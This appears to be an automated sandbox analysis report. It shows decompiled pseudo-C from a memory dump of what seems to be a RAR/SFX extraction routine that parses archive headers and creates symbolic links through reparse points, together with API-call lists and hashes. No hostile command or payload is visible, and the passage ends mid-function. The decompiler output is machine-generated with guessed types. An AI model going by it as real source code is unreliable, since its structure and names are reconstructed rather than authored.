                                                                            				 *(_t242 - 0x14) = _t113;
                                                                            				if(_t113 != 0) {
                                                                            					_t232 = _t242 - 0x1074;
                                                                            					_t190 = E001B4DA0(_t242 - 0x1074, L"UNC\\", 4);
                                                                            					_t245 = _t245 + 0xc;
                                                                            					if(_t190 == 0) {
                                                                            						_t191 = 0x5c;
                                                                            						 *((short*)(_t242 - 0x207c)) = _t191;
                                                                            						_t228 = _t242 - 0x207a;
                                                                            						_t232 = _t242 - 0x106e;
                                                                            					}
                                                                            				}
                                                                            				E001B4D7E(_t228, _t232);
                                                                            				_t116 = E001B2B33(_t242 - 0x207c);
                                                                            				_t233 =  *((intOrPtr*)(_t242 + 8));
                                                                            				_t229 =  *(_t242 + 0xc);
                                                                            				 *(_t242 + 0x10) = _t116;
                                                                            				if( *((char*)(_t233 + 0x618f)) != 0) {
                                                                            					L9:
                                                                            					_push(1);
                                                                            					_push(_t229);
                                                                            					E00199D3A(_t199, _t242);
                                                                            					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
                                                                            						_t118 = CreateDirectoryW(_t229, 0);
                                                                            						__eflags = _t118;
                                                                            						if(_t118 == 0) {
                                                                            							goto L27;
                                                                            						}
                                                                            						goto L14;
                                                                            					} else {
                                                                            						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
                                                                            						if(_t182 == 0xffffffff) {
                                                                            							L27:
                                                                            							 *((char*)(_t242 - 0x18)) = 0;
                                                                            							L28:
                                                                            							E0019159C(_t242 - 0x2c);
                                                                            							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
                                                                            							return  *((intOrPtr*)(_t242 - 0x18));
                                                                            						}
                                                                            						CloseHandle(_t182);
                                                                            						L14:
                                                                            						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
                                                                            						if(_t121 != 3) {
                                                                            							__eflags = _t121 - 2;
                                                                            							if(_t121 == 2) {
                                                                            								L18:
                                                                            								_t202 =  *(_t242 - 0x2c);
                                                                            								_t224 =  *((intOrPtr*)(_t242 - 0x10));
                                                                            								 *_t202 = 0xa000000c;
                                                                            								_t237 = _t224 + _t224;
                                                                            								 *((short*)(_t202 + 0xa)) = _t237;
                                                                            								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
                                                                            								 *((intOrPtr*)(_t202 + 6)) = 0;
                                                                            								E001B4D7E(_t202 + 0x14, _t242 - 0x107c);
                                                                            								_t60 = _t237 + 2; // 0x3
                                                                            								_t238 =  *(_t242 - 0x2c);
                                                                            								 *((short*)(_t238 + 0xc)) = _t60;
                                                                            								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
                                                                            								E001B4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
                                                                            								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
                                                                            								__eflags = _t139;
                                                                            								 *(_t238 + 0x10) = _t139;
                                                                            								L19:
                                                                            								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
                                                                            								 *(_t242 + 0x10) = _t203;
                                                                            								if(_t203 == 0xffffffff) {
                                                                            									goto L27;
                                                                            								}
                                                                            								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
                                                                            								_t262 = _t145;
                                                                            								if(_t145 != 0) {
                                                                            									E0019943C(_t242 - 0x30a0);
                                                                            									 *(_t242 - 4) = 1;
                                                                            									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
                                                                            									_t239 =  *((intOrPtr*)(_t242 + 8));
                                                                            									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
                                                                            									asm("sbb ecx, ecx");
                                                                            									asm("sbb ecx, ecx");
                                                                            									asm("sbb ecx, ecx");
                                                                            									E00199A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
                                                                            									E001994DA(_t242 - 0x30a0);
                                                                            									__eflags =  *((char*)(_t239 + 0x61a0));
                                                                            									if( *((char*)(_t239 + 0x61a0)) == 0) {
                                                                            										E0019A12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
                                                                            									}
                                                                            									E0019946E(_t242 - 0x30a0);
                                                                            									goto L28;
                                                                            								}
                                                                            								CloseHandle( *(_t242 + 0x10));
                                                                            								E00196BF5(_t262, 0x15, 0, _t229);
                                                                            								_t160 = GetLastError();
                                                                            								if(_t160 == 5 || _t160 == 0x522) {
                                                                            									if(E0019FC98() == 0) {
                                                                            										E00191567(_t242 - 0x7c, 0x18);
                                                                            										_t160 = E001A0A9F(_t242 - 0x7c);
                                                                            									}
                                                                            								}
                                                                            								E001AE214(_t160);
                                                                            								E00196E03(0x1d00e0, 9);
                                                                            								_push(_t229);
                                                                            								if( *((char*)(_t197 + 0x10f1)) == 0) {
                                                                            									DeleteFileW();
                                                                            								} else {
                                                                            									RemoveDirectoryW();
                                                                            								}
                                                                            								goto L27;
                                                                            							}
                                                                            							__eflags = _t121 - 1;
                                                                            							if(_t121 != 1) {
                                                                            								goto L27;
                                                                            							}
                                                                            							goto L18;
                                                                            						}
                                                                            						_t222 =  *(_t242 - 0x2c);
                                                                            						_t226 =  *((intOrPtr*)(_t242 - 0x10));
                                                                            						 *_t222 = 0xa0000003;
                                                                            						_t241 = _t226 + _t226;
                                                                            						 *((short*)(_t222 + 0xa)) = _t241;
                                                                            						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
                                                                            						 *((intOrPtr*)(_t222 + 6)) = 0;
                                                                            						E001B4D7E(_t222 + 0x10, _t242 - 0x107c);
                                                                            						_t40 = _t241 + 2; // 0x3
                                                                            						_t238 =  *(_t242 - 0x2c);
                                                                            						 *((short*)(_t238 + 0xc)) = _t40;
                                                                            						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
                                                                            						E001B4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
                                                                            						goto L19;
                                                                            					}
                                                                            				}
                                                                            				if( *(_t242 - 0x14) != 0) {
                                                                            					goto L27;
                                                                            				}
                                                                            				_t185 = E0019B4F2(_t197 + 0x1104);
                                                                            				_t255 = _t185;
                                                                            				if(_t185 != 0) {
                                                                            					goto L27;
                                                                            				}
                                                                            				_push(_t197 + 0x1104);
                                                                            				_push(_t229);
                                                                            				_push(_t197 + 0x28);
                                                                            				_push(_t233);
                                                                            				if(E001977F7(_t223, _t255) == 0) {
                                                                            					goto L27;
                                                                            				}
                                                                            				goto L9;
                                                                            			}

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 00196FCB
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 0019712B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0019713B
                                                                              • Part of subcall function 00197A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00197A24
                                                                              • Part of subcall function 00197A15: GetLastError.KERNEL32 ref: 00197A6A
                                                                              • Part of subcall function 00197A15: CloseHandle.KERNEL32(?), ref: 00197A79
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00197146
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00197254
                                                                            • DeviceIoControl.KERNEL32 ref: 00197280
                                                                            • CloseHandle.KERNEL32(?), ref: 00197292
                                                                            • GetLastError.KERNEL32(00000015,00000000,?), ref: 001972A2
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 001972EE
                                                                            • DeleteFileW.KERNEL32(?), ref: 00197316
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                            • API String ID: 3935142422-3508440684
                                                                            • Opcode ID: 0feac91ea333a4b95eab21573cdd9456df1d4f6a8952457c39b7b633830726a7
                                                                            • Instruction ID: e86438485fb4cc65ba3d916fc948fd962e7b18422316a6175b1237eb20dcb519
                                                                            • Opcode Fuzzy Hash: 0feac91ea333a4b95eab21573cdd9456df1d4f6a8952457c39b7b633830726a7
                                                                            • Instruction Fuzzy Hash: B8B1D071914218ABEF21DFA4DC41FEE77B8AF19300F1444AAF919E7182D770AA45CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E001930FC(intOrPtr* __ecx, void* __eflags) {
                                                                            				void* __ebp;
                                                                            				signed int _t242;
                                                                            				void* _t248;
                                                                            				unsigned int _t250;
                                                                            				signed int _t254;
                                                                            				signed int _t255;
                                                                            				unsigned int _t256;
                                                                            				void* _t257;
                                                                            				char _t270;
                                                                            				signed int _t289;
                                                                            				unsigned int _t290;
                                                                            				intOrPtr _t291;
                                                                            				signed int _t292;
                                                                            				signed int _t295;
                                                                            				char _t302;
                                                                            				signed char _t304;
                                                                            				signed int _t320;
                                                                            				signed int _t331;
                                                                            				signed int _t335;
                                                                            				signed int _t350;
                                                                            				signed char _t352;
                                                                            				unsigned int _t362;
                                                                            				void* _t378;
                                                                            				void* _t380;
                                                                            				void* _t381;
                                                                            				void* _t392;
                                                                            				intOrPtr* _t394;
                                                                            				intOrPtr* _t396;
                                                                            				signed int _t409;
                                                                            				signed int _t419;
                                                                            				char _t431;
                                                                            				signed int _t432;
                                                                            				signed int _t437;
                                                                            				signed int _t441;
                                                                            				intOrPtr _t449;
                                                                            				unsigned int _t455;
                                                                            				unsigned int _t458;
                                                                            				signed int _t462;
                                                                            				signed int _t470;
                                                                            				signed int _t479;
                                                                            				signed int _t484;
                                                                            				signed int _t498;
                                                                            				intOrPtr _t499;
                                                                            				signed int _t500;
                                                                            				signed char _t501;
                                                                            				unsigned int _t502;
                                                                            				void* _t509;
                                                                            				void* _t517;
                                                                            				signed int _t520;
                                                                            				void* _t521;
                                                                            				signed int _t531;
                                                                            				unsigned int _t534;
                                                                            				void* _t539;
                                                                            				intOrPtr _t543;
                                                                            				void* _t544;
                                                                            				void* _t545;
                                                                            				void* _t546;
                                                                            				intOrPtr _t556;
                                                                            
                                                                            				_t396 = __ecx;
                                                                            				_t546 = _t545 - 0x68;
                                                                            				E001AD870(E001C11A9, _t544);
                                                                            				E001AD940();
                                                                            				_t394 = _t396;
                                                                            				E0019C223(_t544 + 0x30, _t394);
                                                                            				 *(_t544 + 0x60) = 0;
                                                                            				 *((intOrPtr*)(_t544 - 4)) = 0;
                                                                            				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
                                                                            					L15:
                                                                            					 *((char*)(_t544 + 0x6a)) = 0;
                                                                            					L16:
                                                                            					if(E0019C42E(_t498, 7) >= 7) {
                                                                            						 *(_t394 + 0x21f4) = 0;
                                                                            						_t509 = _t394 + 0x21e4;
                                                                            						 *_t509 = E0019C29E(_t544 + 0x30);
                                                                            						_t531 = E0019C40A(_t544 + 0x30, 4);
                                                                            						_t242 = E0019C39E(_t498);
                                                                            						__eflags = _t242 | _t498;
                                                                            						if((_t242 | _t498) == 0) {
                                                                            							L85:
                                                                            							E00191EF8(_t394);
                                                                            							L86:
                                                                            							E0019159C(_t544 + 0x30);
                                                                            							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
                                                                            							return  *(_t544 + 0x60);
                                                                            						}
                                                                            						__eflags = _t531;
                                                                            						if(_t531 == 0) {
                                                                            							goto L85;
                                                                            						}
                                                                            						_t42 = _t531 - 3; // -3
                                                                            						_t534 = _t531 + 4 + _t242;
                                                                            						_t409 = _t42 + _t242;
                                                                            						__eflags = _t409;
                                                                            						 *(_t544 + 0x64) = _t534;
                                                                            						if(_t409 < 0) {
                                                                            							goto L85;
                                                                            						}
                                                                            						__eflags = _t534 - 7;
                                                                            						if(_t534 < 7) {
                                                                            							goto L85;
                                                                            						}
                                                                            						E0019C42E(_t498, _t409);
                                                                            						__eflags =  *(_t544 + 0x48) - _t534;
                                                                            						if( *(_t544 + 0x48) < _t534) {
                                                                            							goto L17;
                                                                            						}
                                                                            						_t248 = E0019C37E(_t544 + 0x30);
                                                                            						 *(_t394 + 0x21e8) = E0019C39E(_t498);
                                                                            						_t250 = E0019C39E(_t498);
                                                                            						 *(_t394 + 0x21ec) = _t250;
                                                                            						__eflags =  *_t509 - _t248;
                                                                            						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
                                                                            						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
                                                                            						_t254 =  *(_t394 + 0x21e8);
                                                                            						 *(_t394 + 0x21dc) = _t254;
                                                                            						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
                                                                            						 *(_t544 + 0x6b) = _t255;
                                                                            						__eflags = _t255;
                                                                            						if(_t255 == 0) {
                                                                            							L26:
                                                                            							_t256 = 0;
                                                                            							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
                                                                            							 *(_t544 + 0x58) = 0;
                                                                            							 *(_t544 + 0x54) = 0;
                                                                            							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
                                                                            								L30:
                                                                            								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
                                                                            								_t536 = _t256;
                                                                            								 *(_t544 + 0x64) = _t256;
                                                                            								 *(_t544 + 0x5c) = _t256;
                                                                            								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
                                                                            									_t362 = E0019C39E(_t498);
                                                                            									_t536 = _t362;
                                                                            									 *(_t544 + 0x64) = _t362;
                                                                            									 *(_t544 + 0x5c) = _t498;
                                                                            								}
                                                                            								_t257 = E00191901(_t394,  *(_t394 + 0x21f0));
                                                                            								_t499 = 0;
                                                                            								asm("adc eax, edx");
                                                                            								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00193CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
                                                                            								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
                                                                            								_t500 =  *(_t394 + 0x21e8);
                                                                            								__eflags = _t500 - 1;
                                                                            								if(__eflags == 0) {
                                                                            									E0019A96C(_t394 + 0x2208);
                                                                            									_t419 = 5;
                                                                            									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
                                                                            									_t501 = E0019C39E(_t500);
                                                                            									 *(_t394 + 0x6cb5) = _t501 & 1;
                                                                            									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
                                                                            									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
                                                                            									_t431 = 1;
                                                                            									 *((char*)(_t394 + 0x6cba)) = 1;
                                                                            									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
                                                                            									_t270 = 0;
                                                                            									 *((char*)(_t394 + 0x6cb8)) = 0;
                                                                            									__eflags = _t501 & 0x00000002;
                                                                            									if((_t501 & 0x00000002) == 0) {
                                                                            										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
                                                                            									} else {
                                                                            										 *((intOrPtr*)(_t394 + 0x6cd8)) = E0019C39E(_t501);
                                                                            										_t270 = 0;
                                                                            										_t431 = 1;
                                                                            									}
                                                                            									__eflags =  *(_t394 + 0x6cb5);
                                                                            									if( *(_t394 + 0x6cb5) == 0) {
                                                                            										L81:
                                                                            										_t431 = _t270;
                                                                            										goto L82;
                                                                            									} else {
                                                                            										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
                                                                            										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
                                                                            											L82:
                                                                            											 *((char*)(_t394 + 0x6cb9)) = _t431;
                                                                            											_t432 =  *(_t544 + 0x58);
                                                                            											__eflags = _t432 |  *(_t544 + 0x54);
                                                                            											if((_t432 |  *(_t544 + 0x54)) != 0) {
                                                                            												E0019200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
                                                                            											}
                                                                            											L84:
                                                                            											 *(_t544 + 0x60) =  *(_t544 + 0x48);
                                                                            											goto L86;
                                                                            										}
                                                                            										goto L81;
                                                                            									}
                                                                            								}
                                                                            								if(__eflags <= 0) {
                                                                            									goto L84;
                                                                            								}
                                                                            								__eflags = _t500 - 3;
                                                                            								if(_t500 <= 3) {
                                                                            									__eflags = _t500 - 2;
                                                                            									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
                                                                            									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
                                                                            									 *(_t544 + 0x2c) = _t517;
                                                                            									E0019A8D2(_t517, 0);
                                                                            									_t437 = 5;
                                                                            									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
                                                                            									_t539 =  *(_t544 + 0x2c);
                                                                            									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
                                                                            									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
                                                                            									 *((char*)(_t539 + 0x10f9)) = 1;
                                                                            									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
                                                                            									 *(_t539 + 0x1094) = E0019C39E(_t500);
                                                                            									 *(_t539 + 0x1060) = E0019C39E(_t500);
                                                                            									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
                                                                            									__eflags = _t289;
                                                                            									 *(_t539 + 0x1064) = _t500;
                                                                            									 *(_t539 + 0x109a) = _t289;
                                                                            									if(_t289 != 0) {
                                                                            										 *(_t539 + 0x1060) = 0x7fffffff;
                                                                            										 *(_t539 + 0x1064) = 0x7fffffff;
                                                                            									}
                                                                            									_t441 =  *(_t539 + 0x105c);
                                                                            									_t520 =  *(_t539 + 0x1064);
                                                                            									_t290 =  *(_t539 + 0x1058);
                                                                            									_t502 =  *(_t539 + 0x1060);
                                                                            									__eflags = _t441 - _t520;
                                                                            									if(__eflags < 0) {
                                                                            										L51:
                                                                            										_t290 = _t502;
                                                                            										_t441 = _t520;
                                                                            										goto L52;
                                                                            									} else {
                                                                            										if(__eflags > 0) {
                                                                            											L52:
                                                                            											 *(_t539 + 0x106c) = _t441;
                                                                            											 *(_t539 + 0x1068) = _t290;
                                                                            											_t291 = E0019C39E(_t502);
                                                                            											__eflags =  *(_t539 + 0x1094) & 0x00000002;
                                                                            											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
                                                                            											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
                                                                            												E001A0A25(_t539 + 0x1040, _t502, E0019C29E(_t544 + 0x30), 0);
                                                                            											}
                                                                            											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
                                                                            											__eflags =  *(_t539 + 0x1094) & 0x00000004;
                                                                            											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
                                                                            												 *(_t539 + 0x1070) = 2;
                                                                            												 *((intOrPtr*)(_t539 + 0x1074)) = E0019C29E(_t544 + 0x30);
                                                                            											}
                                                                            											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
                                                                            											_t292 = E0019C39E(_t502);
                                                                            											 *(_t544 + 0x64) = _t292;
                                                                            											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
                                                                            											_t449 = (_t292 & 0x0000003f) + 0x32;
                                                                            											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
                                                                            											__eflags = _t449 - 0x32;
                                                                            											if(_t449 != 0x32) {
                                                                            												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
                                                                            											}
                                                                            											 *((char*)(_t539 + 0x18)) = E0019C39E(_t502);
                                                                            											_t521 = E0019C39E(_t502);
                                                                            											 *(_t539 + 0x10fc) = 2;
                                                                            											_t295 =  *((intOrPtr*)(_t539 + 0x18));
                                                                            											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
                                                                            											__eflags = _t295 - 1;
                                                                            											if(_t295 != 1) {
                                                                            												__eflags = _t295;
                                                                            												if(_t295 == 0) {
                                                                            													_t177 = _t539 + 0x10fc;
                                                                            													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
                                                                            													__eflags =  *_t177;
                                                                            												}
                                                                            											} else {
                                                                            												 *(_t539 + 0x10fc) = 1;
                                                                            											}
                                                                            											_t455 =  *(_t539 + 8);
                                                                            											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
                                                                            											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
                                                                            											__eflags =  *(_t544 + 0x60) - 2;
                                                                            											_t458 =  *(_t544 + 0x64);
                                                                            											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
                                                                            											if( *(_t544 + 0x60) != 2) {
                                                                            												L65:
                                                                            												_t302 = 0;
                                                                            												__eflags = 0;
                                                                            												goto L66;
                                                                            											} else {
                                                                            												__eflags = _t458 & 0x00000040;
                                                                            												if((_t458 & 0x00000040) == 0) {
                                                                            													goto L65;
                                                                            												}
                                                                            												_t302 = 1;
                                                                            												L66:
                                                                            												 *((char*)(_t539 + 0x10f0)) = _t302;
                                                                            												_t304 =  *(_t539 + 0x1094) & 1;
                                                                            												 *(_t539 + 0x10f1) = _t304;
                                                                            												asm("sbb eax, eax");
                                                                            												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
                                                                            												asm("sbb eax, eax");
                                                                            												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
                                                                            												__eflags = _t521 - 0x1fff;
                                                                            												if(_t521 >= 0x1fff) {
                                                                            													_t521 = 0x1fff;
                                                                            												}
                                                                            												E0019C300(_t544 + 0x30, _t544 - 0x2074, _t521);
                                                                            												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
                                                                            												_push(0x800);
                                                                            												_t522 = _t539 + 0x28;
                                                                            												_push(_t539 + 0x28);
                                                                            												_push(_t544 - 0x2074);
                                                                            												E001A1094();
                                                                            												_t462 =  *(_t544 + 0x58);
                                                                            												__eflags = _t462 |  *(_t544 + 0x54);
                                                                            												if((_t462 |  *(_t544 + 0x54)) != 0) {
                                                                            													E0019200C(_t394, _t544 + 0x30, _t462, _t539);
                                                                            												}
                                                                            												_t319 =  *(_t544 + 0x60);
                                                                            												__eflags =  *(_t544 + 0x60) - 2;
                                                                            												if( *(_t544 + 0x60) != 2) {
                                                                            													L72:
                                                                            													_t320 = E001B2B69(_t319, _t522, L"CMT");
                                                                            													__eflags = _t320;
                                                                            													if(_t320 == 0) {
                                                                            														 *((char*)(_t394 + 0x6cb6)) = 1;
                                                                            													}
                                                                            													goto L74;
                                                                            												} else {
                                                                            													E00191F3D(_t394, _t539);
                                                                            													_t319 =  *(_t544 + 0x60);
                                                                            													__eflags =  *(_t544 + 0x60) - 2;
                                                                            													if( *(_t544 + 0x60) == 2) {
                                                                            														L74:
                                                                            														__eflags =  *(_t544 + 0x6b);
                                                                            														if(__eflags != 0) {
                                                                            															E00196BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
                                                                            														}
                                                                            														goto L84;
                                                                            													}
                                                                            													goto L72;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            										__eflags = _t290 - _t502;
                                                                            										if(_t290 > _t502) {
                                                                            											goto L52;
                                                                            										}
                                                                            										goto L51;
                                                                            									}
                                                                            								}
                                                                            								__eflags = _t500 - 4;
                                                                            								if(_t500 == 4) {
                                                                            									_t470 = 5;
                                                                            									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
                                                                            									_t331 = E0019C39E(_t500);
                                                                            									__eflags = _t331;
                                                                            									if(_t331 == 0) {
                                                                            										 *(_t394 + 0x225c) = E0019C39E(_t500) & 0x00000001;
                                                                            										_t335 = E0019C251(_t544 + 0x30) & 0x000000ff;
                                                                            										 *(_t394 + 0x2260) = _t335;
                                                                            										__eflags = _t335 - 0x18;
                                                                            										if(_t335 <= 0x18) {
                                                                            											E0019C300(_t544 + 0x30, _t394 + 0x2264, 0x10);
                                                                            											__eflags =  *(_t394 + 0x225c);
                                                                            											if( *(_t394 + 0x225c) != 0) {
                                                                            												E0019C300(_t544 + 0x30, _t394 + 0x2274, 8);
                                                                            												E0019C300(_t544 + 0x30, _t544 + 0x64, 4);
                                                                            												E0019F524(_t544 - 0x74);
                                                                            												E0019F56A(_t544 - 0x74, _t394 + 0x2274, 8);
                                                                            												_push(_t544 + 8);
                                                                            												E0019F435(_t544 - 0x74);
                                                                            												_t350 = E001AF3CA(_t544 + 0x64, _t544 + 8, 4);
                                                                            												asm("sbb al, al");
                                                                            												_t352 =  ~_t350 + 1;
                                                                            												__eflags = _t352;
                                                                            												 *(_t394 + 0x225c) = _t352;
                                                                            											}
                                                                            											 *((char*)(_t394 + 0x6cbc)) = 1;
                                                                            											goto L84;
                                                                            										}
                                                                            										_push(_t335);
                                                                            										_push(L"hc%u");
                                                                            										L40:
                                                                            										_push(0x14);
                                                                            										_push(_t544);
                                                                            										E00193E41();
                                                                            										E00193DEC(_t394, _t394 + 0x1e, _t544);
                                                                            										goto L86;
                                                                            									}
                                                                            									_push(_t331);
                                                                            									_push(L"h%u");
                                                                            									goto L40;
                                                                            								}
                                                                            								__eflags = _t500 - 5;
                                                                            								if(_t500 == 5) {
                                                                            									_t479 = _t500;
                                                                            									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
                                                                            									 *(_t394 + 0x45ac) = E0019C39E(_t500) & 0x00000001;
                                                                            									 *((short*)(_t394 + 0x45ae)) = 0;
                                                                            									 *((char*)(_t394 + 0x45ad)) = 0;
                                                                            								}
                                                                            								goto L84;
                                                                            							}
                                                                            							_t484 = E0019C39E(_t498);
                                                                            							 *(_t544 + 0x54) = _t498;
                                                                            							_t256 = 0;
                                                                            							 *(_t544 + 0x58) = _t484;
                                                                            							__eflags = _t498;
                                                                            							if(__eflags < 0) {
                                                                            								goto L30;
                                                                            							}
                                                                            							if(__eflags > 0) {
                                                                            								goto L85;
                                                                            							}
                                                                            							__eflags = _t484 -  *(_t394 + 0x21f0);
                                                                            							if(_t484 >=  *(_t394 + 0x21f0)) {
                                                                            								goto L85;
                                                                            							}
                                                                            							goto L30;
                                                                            						}
                                                                            						E00191EF8(_t394);
                                                                            						 *((char*)(_t394 + 0x6cc4)) = 1;
                                                                            						E00196E03(0x1d00e0, 3);
                                                                            						__eflags =  *((char*)(_t544 + 0x6a));
                                                                            						if(__eflags == 0) {
                                                                            							goto L26;
                                                                            						} else {
                                                                            							E00196BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
                                                                            							 *((char*)(_t394 + 0x6cc5)) = 1;
                                                                            							goto L86;
                                                                            						}
                                                                            					}
                                                                            					L17:
                                                                            					E00193DAB(_t394, _t498);
                                                                            					goto L86;
                                                                            				}
                                                                            				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
                                                                            				asm("adc eax, ecx");
                                                                            				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
                                                                            				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
                                                                            					goto L15;
                                                                            				} else {
                                                                            					_push(0x10);
                                                                            					_push(_t544 + 0x18);
                                                                            					 *((char*)(_t544 + 0x6a)) = 1;
                                                                            					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
                                                                            						goto L17;
                                                                            					}
                                                                            					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
                                                                            						L7:
                                                                            						 *(_t544 + 0x6b) = 1;
                                                                            						L8:
                                                                            						E00193C40(_t394);
                                                                            						_t529 = _t394 + 0x2264;
                                                                            						_t543 = _t394 + 0x1024;
                                                                            						E0019607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
                                                                            						if( *(_t394 + 0x225c) == 0) {
                                                                            							L13:
                                                                            							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
                                                                            							goto L16;
                                                                            						} else {
                                                                            							_t378 = _t394 + 0x2274;
                                                                            							while(1) {
                                                                            								_t380 = E001AF3CA(_t544 + 0x28, _t378, 8);
                                                                            								_t546 = _t546 + 0xc;
                                                                            								if(_t380 == 0) {
                                                                            									goto L13;
                                                                            								}
                                                                            								_t563 =  *(_t544 + 0x6b);
                                                                            								_t381 = _t394 + 0x1e;
                                                                            								_push(_t381);
                                                                            								_push(_t381);
                                                                            								if( *(_t544 + 0x6b) != 0) {
                                                                            									_push(6);
                                                                            									E00196BF5(__eflags);
                                                                            									 *((char*)(_t394 + 0x6cc5)) = 1;
